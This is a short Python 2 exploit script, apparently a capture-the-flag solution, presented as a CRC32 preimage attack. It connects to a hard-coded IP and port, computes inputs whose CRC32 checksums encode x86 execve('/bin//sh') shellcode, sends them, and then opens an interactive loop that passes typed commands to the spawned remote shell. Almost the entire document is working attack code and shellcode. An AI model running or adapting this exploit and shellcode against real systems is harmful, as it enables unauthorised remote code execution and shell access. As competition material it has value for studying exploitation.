Description:
CRC32 preimage attack (with x86 execve shellcode!)
sc.tarfrom binascii import crc32
from socket import *
from struct import *
mysocket = socket(AF_INET, SOCK_STREAM)
mysocket.connect(("54.178.232.195",5757))
payload = []
d = mysocket.recv(1024)
salt = d[6:-1].decode('hex')
org_crc = crc32(salt)
offset = 0
v_crc_table = [0] * 256
for i in range(256):
v_crc_table[(crc32(chr(i), 0) & 0xffffffff) >> 24] = (crc32(chr(i), 0) & 0xffffffff)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69""\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90"
for offset in range(0, len(shellcode), 4):
r=''
old_crc = org_crc
s = shellcode[offset:offset+4]
a = []
c = ord(s[-1])
d = v_crc_table[c]
a.append(d & 0xffffffff)
for i in range(2,5):
c = ord(s[-i])
s_c = c
ss = 0x00ff0000
for j, cc in enumerate(a[::-1]):
s_c ^= (cc & (ss >> (j * 8)) ) >> (16-j*8)
a.append(v_crc_table[s_c] & 0xffffffff)
print list(enumerate(a[::-1]))
print a
print "\n".join(map(lambda x:hex(x)[2:].zfill(8),a))
print '================='
print a
for j in range(4):
for i in range(256):
if (crc32(chr(i), old_crc) & 0xffffffff) >> 24 == (a[-j-1] >> 24):
r+=chr(i)
break
old_crc = crc32(chr(i), old_crc) & 0xffffffff
print r.encode('hex')
payload.append(r)
print pack("I", len(payload)).encode("hex") + ''.join(map(lambda a: a.encode("hex"), payload))
print map(hex, map(lambda x: x & 0xffffffff, map(lambda x: crc32(salt+x), payload)))
mysocket.send(pack("I", len(payload)))
for string in payload:
mysocket.send(pack("I", len(string)) + string)
while True:
mysocket.send(raw_input("$ ")+"\n")
print mysocket.recv(1024)